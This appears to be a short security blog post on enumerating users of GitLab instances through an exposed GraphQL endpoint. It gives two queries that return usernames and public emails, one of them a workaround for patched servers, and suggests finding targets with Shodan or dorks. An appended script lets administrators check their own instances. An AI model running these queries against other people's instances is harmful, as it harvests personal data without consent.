Some GitLab instances expose a public GraphQL endpoint, which makes it possible to enumerate users, among other things.
There is not much to add, it's simple; you can use Shodan or Google Dorks to find GitLab instances, then change the path to /-/graphql-explorer (e.g, , ).
Query examples:
Simple
{
  users {
    nodes {
      id
      username
      name
      publicEmail
    }
  }
}
You may stumble on patched instances, like I did while I was writing this; I could not retrieve the users using the first query, so I got creative.
{
  projects {
    edges {
      node {
        id
        name
        description
        createdAt
        projectMembers {
          nodes {
            user {
              id
              username
              name
              publicEmail
              webUrl
              status {
                message
              }
            }
          }
        }
        ciConfigPathOrDefault
      }
    }
  }
}
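A self-check for administrators, added here as an example and not code from the original post: it sends the two queries above without credentials to an instance you run and reports which response paths return user objects. The `/api/graphql` path, the function names and the sample responses are assumptions of this example.

```python
import json
import urllib.request

# The page's two queries, trimmed to the identity fields they request.
QUERIES = {
    "users": "{ users { nodes { username publicEmail } } }",
    "projectMembers": "{ projects { edges { node { projectMembers "
                      "{ nodes { user { username publicEmail } } } } } } }",
}

def exposure(response):
    """Map each JSON path that returned user objects (dicts carrying a
    username) to how many it held and how many had a public email."""
    found = {}
    def walk(node, where):
        if isinstance(node, dict):
            if isinstance(node.get("username"), str):
                hit = found.setdefault(where, {"users": 0, "emails": 0})
                hit["users"] += 1
                hit["emails"] += bool(node.get("publicEmail"))
            for key, value in node.items():
                walk(value, f"{where}.{key}")
        elif isinstance(node, list):
            for item in node:
                walk(item, where)
    walk(response.get("data") or {}, "data")
    return found

def audit(base_url):
    """POST each query with no credentials to an instance you administer."""
    report = {}
    for label, query in QUERIES.items():
        req = urllib.request.Request(
            base_url.rstrip("/") + "/api/graphql",
            data=json.dumps({"query": query}).encode(),
            headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            report[label] = exposure(json.load(resp))
    return report

# Constructed sample responses, not captured from any real instance.
BLOCKED = {"data": None, "errors": [{"message": "constructed error"}]}
LEAKY = {"data": {"projects": {"edges": [{"node": {"projectMembers": {"nodes": [
    {"user": {"username": "alice", "publicEmail": "alice@example.com"}},
    {"user": {"username": "bob", "publicEmail": None}}]}}}]}}}

if __name__ == "__main__":
    print(exposure(BLOCKED), exposure(LEAKY))
```

An empty report for both queries means anonymous callers get no user objects through either path; a non-empty entry names the path to close off.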